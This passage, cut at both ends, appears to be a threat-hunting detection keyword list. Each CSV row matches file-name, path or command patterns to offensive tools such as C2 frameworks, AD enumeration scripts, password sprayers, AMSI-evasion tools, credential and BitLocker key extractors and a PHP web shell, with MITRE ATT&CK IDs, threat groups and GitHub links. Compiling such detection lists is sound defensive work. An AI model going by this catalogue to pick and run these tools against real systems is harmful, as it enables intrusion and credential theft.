APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,1,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -*Outflank-Recon-AD*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*OutlookEmailAbuse.ps1*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*Out-Minidump.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Out-ObfuscatedAst.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Out-ObfuscatedStringCommand.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Out-ObfuscatedTokenCommand.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*output*kitten.exe*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*Output.aes.zip*,offensive_tool_keyword,EncryptedZIP,Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory,T1564.001 - T1027 - T1214.001,TA0005 - TA0010,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*output/AccountsWithSPN.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AdminAccessComputers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllDomainControllers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllDomainGroups.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllDomainHosts.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllDomainUserAccounts.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllDomainUsers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllServers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllServers2k12.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllServers2k16.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllServers2k19.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllServers2k22.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllServers2k8.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/AllTrusts.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/CompletedDescriptionField.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/DescriptionContainsPass.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/DNETAccountsByDescription.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/DomainAdmins.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/DomainGroupsLocalAdmin.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/DomainUserAccountsWithCompletedADDescription.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/ExchangeServers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/html/data/beacons.json*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*output/NeverLoggedInAccounts.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/NonDCWindows10Computers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/NonDCWindows11Computers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/NonDCWindows7Computers.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/PasswordNeverExpire.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/payloads/*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*output/RatChatPT_unix*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*output/RDPMachines.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/UsersInDomainAdminsGroup.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/UsersLastPasswordChange.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/UsersNoPasswordRequired.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/UsersPasswordMustChange.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/UsersPasswordNotChanged.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*output/WinRMMachines.txt*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*Out-RundllCommand*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*OverrideLHOST 360.com*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,0,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*owa */autodiscover/autodiscover.xml* --recon*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*OWASP*Amass*,offensive_tool_keyword,amass,The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.,T1595 - T1596 - T1018 - T1482,TA0007 - TA0043 - ,N/A,N/A,Information Gathering,https://github.com/caffix/amass,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*OwnerPersist-POST.*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Ox-Bruter.pl*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*-p 5000:5000 pador_vuln_server*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,0,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -*P0cL4bs*,offensive_tool_keyword,Github Username,github repo name hosting lots of exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/P0cL4bs,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*p0dalirius/Coercer*,offensive_tool_keyword,ADCSKiller,ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure,T1552.004 - T1003.003 - T1114.002,TA0006 - TA0003 - TA0005,N/A,N/A,Exploitation tools,https://github.com/grimlockx/ADCSKiller,1,1,N/A,N/A,6,535,53,2023-05-19T17:36:37Z,2023-05-19T06:51:41Z -*p0dalirius/Coercer*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*p0dalirius/ExtractBitlockerKeys*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,1,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*p0dalirius/LDAPWordlistHarvester*,offensive_tool_keyword,LDAPWordlistHarvester,A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.,T1210.001 - T1087.003 - T1110,TA0001 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/p0dalirius/LDAPWordlistHarvester,1,1,N/A,5,3,218,14,2023-10-01T21:12:10Z,2023-09-22T10:10:10Z -*p0dalirius/pyLAPS*,offensive_tool_keyword,pyLAPS,A simple way to read and write LAPS passwords from linux.,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/p0dalirius/pyLAPS,1,1,N/A,9,1,50,9,2023-10-01T19:17:01Z,2021-10-05T18:35:21Z -*p0f -i eth* -p*,offensive_tool_keyword,p0f,P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications,T1046 - T1040,TA0007 - TA0010,N/A,N/A,Sniffing & Spoofing,https://www.kali.org/tools/p0f/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*p0f/p0f.fp*,offensive_tool_keyword,p0f,P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications,T1046 - T1040,TA0007 - TA0010,N/A,N/A,Sniffing & Spoofing,https://www.kali.org/tools/p0f/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*p0wnedShell*,offensive_tool_keyword,p0wnedShell,p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.,T1086 - T1059 - T1106 - T1566,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation tools,https://github.com/Cn33liz/p0wnedShell,1,1,N/A,N/A,10,1488,363,2019-08-02T16:24:39Z,2015-12-25T11:44:37Z -*p0wny-shell*,offensive_tool_keyword,p0wny-shell,p0wny@shell:~# is a very basic. single-file. PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.,T1059 - T1027 - T1053 - T1035 - T1105,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/flozz/p0wny-shell,1,1,N/A,N/A,10,1578,620,2023-08-10T15:54:47Z,2016-11-09T20:41:01Z -*p3nt4/Nuages*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*P4wnP1*,offensive_tool_keyword,P4wnP1,P4wnP1 is a highly customizable USB attack platform. based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).,T1200 - T1056.001 - T1059.003 - T1547.001,TA0002 - TA0003 - TA0004,N/A,N/A,Network Exploitation tools,https://github.com/RoganDawes/P4wnP1,1,1,N/A,N/A,10,3768,667,2019-10-31T12:30:16Z,2017-02-22T14:34:09Z -*P8CuaPrgwBjunvZxJcgq*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*pack_py_payload*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*package externc2*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - 